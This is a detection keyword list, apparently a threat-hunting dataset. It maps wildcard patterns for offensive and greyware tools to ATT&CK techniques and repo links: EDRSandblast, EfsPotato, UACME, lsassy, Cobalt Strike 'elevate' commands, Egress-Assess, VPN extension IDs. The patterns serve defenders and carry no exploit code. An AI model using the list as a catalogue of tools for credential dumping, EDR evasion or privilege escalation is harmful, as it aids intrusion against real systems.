-*ecs_task_def_data/all_task_def.txt*,offensive_tool_keyword,pacu,The AWS exploitation framework designed for testing the security of Amazon Web Services environments.,T1136.003 - T1190 - T1078.004,TA0006 - TA0001,N/A,N/A,Framework,https://github.com/RhinoSecurityLabs/pacu,1,0,N/A,9,10,3687,624,2023-10-03T04:16:53Z,2018-06-13T21:58:59Z
-*Ed1s0nZ/cool/*,offensive_tool_keyword,C2 related tools,An anti-virus platform written in the Golang-Gin framework with built-in BypassAV methods such as separation and bundling.,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,N/A,C2,https://github.com/Ed1s0nZ/cool,1,1,N/A,10,10,668,113,2023-07-13T07:04:30Z,2021-11-10T14:32:34Z
-*edge_wscript_wsh_injection*,offensive_tool_keyword,beef,BeEF is short for The Browser Exploitation Framework. 
It is a penetration testing tool that focuses on the web browser.,T1201 - T1505.003,TA0001 - TA0002,N/A,N/A,Frameworks,https://github.com/beefproject/beef,1,1,N/A,N/A,10,8794,2027,2023-09-30T17:06:35Z,2011-11-23T06:53:25Z
-*edge1.parrot.run*,offensive_tool_keyword,parrot os,Parrot OS is a Debian-based. security-oriented Linux distribution that is designed for ethical hacking. penetration testing and digital forensics.,T1590 - T1200 - T1027 - T1578 - T1003 - T1001 - T1046 - T1570 - T1114 - T1105,TA0043 - TA0002 - TA0003 - TA0004 - TA0006 - TA0005 - TA0007 - TA0008 - TA0009 - TA0011,N/A,N/A,Exploitation OS,https://www.parrotsec.org/download/,1,1,N/A,N/A,N/A,N/A,N/A,N/A,N/A
-*EditC2Dialog.*,offensive_tool_keyword,HardHatC2,A C# Command & Control framework,T1021 - T1043 - T1055 - T1071 - T1570,TA0001 - TA0002 - TA0003 - TA0008 - TA0010,N/A,N/A,C2,https://github.com/DragoQCC/HardHatC2,1,1,N/A,10,10,825,133,2023-09-06T05:17:05Z,2022-12-08T19:40:47Z
-*edknjdjielmpdlnllkdmaghlbpnmjmgb*,greyware_tool_keyword,Muscle VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*edraser.py -*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z
-*EDRaser-main*,offensive_tool_keyword,EDRaser,EDRaser is a powerful tool for remotely deleting access logs & Windows event logs & databases and other files on remote machines.,T1070.004 - T1027 - T1564.001,TA0005 - TA0040 - TA0003,N/A,N/A,Defense 
Evasion,https://github.com/SafeBreach-Labs/EDRaser,1,1,N/A,10,2,118,16,2023-09-27T13:45:05Z,2023-08-10T04:30:45Z
-*EDRSandblast.c*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,0,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z
-*EDRSandblast.exe*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,1,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z
-*EDRSandblast.exe*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,1,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z
-*EDRSandBlast.h*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,0,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z
-*edrsandblast.py*,offensive_tool_keyword,lsassy,Extract credentials from lsass remotely,T1003.001 - T1021.001 - T1021.002 - T1555.003,TA0006,N/A,N/A,Credential Access,https://github.com/Hackndo/lsassy,1,1,N/A,N/A,10,1745,232,2023-07-19T10:46:59Z,2019-12-03T14:03:41Z
-*EDRSandblast.sln*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense 
Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,1,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z
-*EDRSandblast.sln*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,1,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z
-*EDRSandblast.vcxproj*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,1,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z
-*EDRSandblast_API.c*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,1,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z
-*EDRSandblast_API.exe*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,1,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z
-*EDRSandblast_API.h*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,1,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z
-*EDRSandblast_CLI*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast 
is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,1,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z
-*EDRSandblast_LsassDump*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,1,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z
-*EDRSandblast_LsassDump.c*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,1,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z
-*EDRSandblast_LsassDump.exe*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,1,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z
-*EDRSandblast_StaticLibrary*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,1,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z
-*EDRSandblast-GodFault*,offensive_tool_keyword,EDRSandblast-GodFault,Integrates GodFault into EDR Sandblast achieving the same result without the use of any vulnerable drivers.,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense 
Evasion,https://github.com/gabriellandau/EDRSandblast-GodFault,1,1,N/A,10,2,180,34,2023-08-28T18:14:20Z,2023-06-01T19:32:09Z
-*EDRSandblast-master*,offensive_tool_keyword,EDRSandBlast,EDRSandBlast is a tool written in C that weaponize a vulnerable signed driver to bypass EDR detections,T1547.002 - T1055.001 - T1205,TA0004 - TA0005,N/A,N/A,Defense Evasion,https://github.com/wavestone-cdt/EDRSandblast,1,1,N/A,10,10,1117,224,2023-09-22T14:18:21Z,2021-11-02T15:02:42Z
-*EEC35BCF-E990-4260-828D-2B4F9AC97269*,offensive_tool_keyword,D1rkInject,Threadless injection that loads a module into the target process and stomps it and reverting back memory protections and original memory state,T1055 - T1055.012 - T1055.002 - T1574.002,TA0002 - TA0005,N/A,N/A,Defense Evasion,https://github.com/TheD1rkMtr/D1rkInject,1,0,N/A,9,2,129,24,2023-08-02T02:45:46Z,2023-08-02T02:13:55Z
-*eeddce39694b2f054aa86a7c37b2b56427209f775d27438a9427410550a2740b*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*eeriedusk/nysm*,offensive_tool_keyword,nysm,nysm is a stealth post-exploitation container,T1610 - T1037 - T1070,TA0005 - TA0002 - TA0003,N/A,N/A,POST Exploitation tools,https://github.com/eeriedusk/nysm,1,1,N/A,10,1,30,3,2023-09-30T21:17:33Z,2023-09-25T10:03:52Z
-*ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969*,offensive_tool_keyword,UACME,Defeating Windows User Account Control by abusing built-in Windows AutoElevate backdoor.,T1548 - T1547 - T1218,TA0002 - TA0007,N/A,N/A,Exploitation tools,https://github.com/hfiref0x/UACME,1,0,N/A,N/A,10,5486,1277,2023-09-29T15:02:03Z,2015-03-28T12:04:33Z
-*EfsPotato-*.exe*,offensive_tool_keyword,viperc2,vipermsf Metasploit - Viper is a graphical intranet penetration tool which modularizes and weaponizes the 
tactics and technologies commonly used in the process of Intranet penetration,T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218,TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040,N/A,N/A,Frameworks,https://github.com/FunnyWolf/vipermsf,1,1,N/A,N/A,1,78,37,2023-09-28T08:36:47Z,2021-01-20T13:08:24Z
-*EfsPotato*efsrpc*,offensive_tool_keyword,EfsPotato,Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability),T1068 - T1055.002 - T1070.004,TA0003 - TA0005 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/EfsPotato,1,1,N/A,10,7,613,114,2023-06-01T15:03:53Z,2021-07-26T21:36:16Z
-*EfsPotato*lsarpc*,offensive_tool_keyword,EfsPotato,Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability),T1068 - T1055.002 - T1070.004,TA0003 - TA0005 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/EfsPotato,1,1,N/A,10,7,613,114,2023-06-01T15:03:53Z,2021-07-26T21:36:16Z
-*EfsPotato*lsarpc*,offensive_tool_keyword,EfsPotato,Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability),T1068 - T1055.002 - T1070.004,TA0003 - TA0005 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/EfsPotato,1,1,N/A,10,7,613,114,2023-06-01T15:03:53Z,2021-07-26T21:36:16Z
-*EfsPotato*lsass*,offensive_tool_keyword,EfsPotato,Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability),T1068 - T1055.002 - T1070.004,TA0003 - TA0005 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/EfsPotato,1,1,N/A,10,7,613,114,2023-06-01T15:03:53Z,2021-07-26T21:36:16Z
-*EfsPotato*netlogon*,offensive_tool_keyword,EfsPotato,Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability),T1068 - 
T1055.002 - T1070.004,TA0003 - TA0005 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/EfsPotato,1,1,N/A,10,7,613,114,2023-06-01T15:03:53Z,2021-07-26T21:36:16Z
-*EfsPotato*samr*,offensive_tool_keyword,EfsPotato,Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability),T1068 - T1055.002 - T1070.004,TA0003 - TA0005 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/EfsPotato,1,1,N/A,10,7,613,114,2023-06-01T15:03:53Z,2021-07-26T21:36:16Z
-*EfsPotato-main*,offensive_tool_keyword,EfsPotato,Exploit for EfsPotato(MS-EFSR EfsRpcOpenFileRaw with SeImpersonatePrivilege local privalege escalation vulnerability),T1068 - T1055.002 - T1070.004,TA0003 - TA0005 - TA0002,N/A,N/A,Privilege Escalation,https://github.com/zcgonvh/EfsPotato,1,1,N/A,10,7,613,114,2023-06-01T15:03:53Z,2021-07-26T21:36:16Z
-*egblhcjfjmbjajhjhpmnlekffgaemgfh*,greyware_tool_keyword,Fornex VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*EgeBalci/amber@latest*,offensive_tool_keyword,exegol,Fully featured and community-driven hacking environment with hundreds of offensive tools,T1218 - T1140 - T1543 - T1095 - T1571 - T1547 - T1078 - T1559 - ?,TA0043 - TA0002 - TA0004 - TA0011 - TA0003 - ?,N/A,N/A,Exploitation tool,https://github.com/ThePorgs/Exegol,1,0,N/A,10,10,1251,151,2023-09-30T20:47:39Z,2020-03-09T19:12:11Z
-*EggShell.py*,offensive_tool_keyword,Eggshell,EggShell is a post exploitation surveillance tool written in Python. It gives you a command line session with extra functionality between you and a target machine. EggShell gives you the power and convenience of uploading/downloading files. tab completion. taking pictures. 
location tracking. shell command execution. persistence. escalating privileges. password retrieval. and much more. This is project is a proof of concept. intended for use on machines you own,T1027 - T1553 - T1003 - T1059 - T1558.001,TA0002 - TA0006 - TA0008,N/A,N/A,POST Exploitation tools,https://github.com/neoneggplant/EggShell,1,1,N/A,N/A,10,1562,404,2021-03-25T22:04:52Z,2015-07-02T16:58:30Z
-*Egress-Assess Exfil Data*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,email subject,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z
-*Egress-Assess Report*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z
-*Egress-Assess transfer share*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,0,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z
-*EgressAssess With Attachment*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,email body,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z 
-*Egress-Assess.*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z
-*EgressAssess.ps1*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z
-*Egress-Assess-master*,offensive_tool_keyword,Egress-Assess,Egress-Assess is a tool used to test egress data detection capabilities,T1561 - T1041 - T1558 - T1071 - T1074,TA0010 - TA0011 - TA0008,N/A,Darkhotel - DUBNIUM - Putter Panda,Exploitation tools,https://github.com/FortyNorthSecurity/Egress-Assess,1,1,can be used for data exfiltration simulation,8,6,546,141,2023-08-09T18:40:57Z,2014-12-10T13:39:11Z
-*egressbuster*,offensive_tool_keyword,egressbuster,EgressBuster is a way to test the effectiveness of egress filtering for an individual area. When performing a penetration test. often times companies leverage egress filtering in order to prevent access to the outside Internet. Most companies have special exceptions and allow ports but they may be difficult to find.,T1046 - T1570 - T1590,TA0001 - TA0007,N/A,N/A,Exploitation tools,https://github.com/trustedsec/egressbuster,1,1,N/A,N/A,4,327,104,2021-02-17T00:54:07Z,2015-05-14T02:19:26Z
-*egresscheck-framework*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. 
While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries,T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106,TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005,N/A,LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ,Frameworks,https://github.com/EmpireProject/Empire,1,1,Invoke-EgressCheck.ps1,N/A,10,7102,2790,2020-01-19T22:50:59Z,2015-08-05T18:25:57Z
-*ehbhfpfdkmhcpaehaooegfdflljcnfec*,greyware_tool_keyword,WeVPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*eidnihaadmmancegllknfbliaijfmkgo*,greyware_tool_keyword,Push VPN,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data 
Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*ejabberd2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*ejkaocphofnobjdedneohbbiilggdlbi*,greyware_tool_keyword,Hotspot Shield Elite VPN Proxy,External VPN usage within coporate network,T1090.003 - T1133 - T1572,TA0003 - TA0001 - TA0011 - TA0010 - TA0005,N/A,N/A,Data Exfiltration,https://raw.githubusercontent.com/SigmaHQ/sigma/43277f26fc1c81fc98fc79147b711189e901b757/rules/windows/registry/registry_set/registry_set_chrome_extension.yml,1,0,detection in registry,8,10,N/A,N/A,N/A,N/A
-*elastic-agent.exe uninstall*,greyware_tool_keyword,elastic-agent,uninstall elast-agent from the system,T1562.004 - T1070.004,TA0005,N/A,N/A,Defense Evasion,N/A,1,0,N/A,6,8,N/A,N/A,N/A,N/A
-*eldraco/domain_analyzer*,offensive_tool_keyword,domain_analyzer,Analyze the security of any domain by finding all the information possible,T1560 - T1590 - T1200 - T1213 - T1057,TA0002 - TA0009,N/A,N/A,Information Gathering,https://github.com/eldraco/domain_analyzer,1,1,N/A,6,10,1831,259,2022-12-29T10:57:33Z,2017-08-08T18:52:34Z
-*electrum2john.py*,offensive_tool_keyword,john,John the Ripper jumbo - advanced offline password cracker,T1110 - T1003.001,TA0006,N/A,N/A,Credential Access,https://github.com/openwall/john/,1,1,N/A,N/A,10,8293,1937,2023-10-03T13:59:15Z,2011-12-16T19:43:47Z
-*elevate juicypotato *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - 
T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A
-*elevate Printspoofer*,offensive_tool_keyword,cobaltstrike,Reflection dll implementation of PrintSpoofer used in conjunction with Cobalt Strike,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - 
LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://github.com/crisprss/PrintSpoofer,1,0,N/A,10,10,76,8,2021-10-07T17:45:00Z,2021-10-07T17:28:45Z
-*elevate svc-exe *,offensive_tool_keyword,cobaltstrike,Adversary Simulations and Red Team Operations are security assessments that replicate the tactics and techniques of an advanced adversary in a network,T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047,TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040,N/A,DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29,C2,https://www.cobaltstrike.com/,1,0,N/A,10,10,N/A,N/A,N/A,N/A
-*ElevatePrivs*,offensive_tool_keyword,empire,Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. 
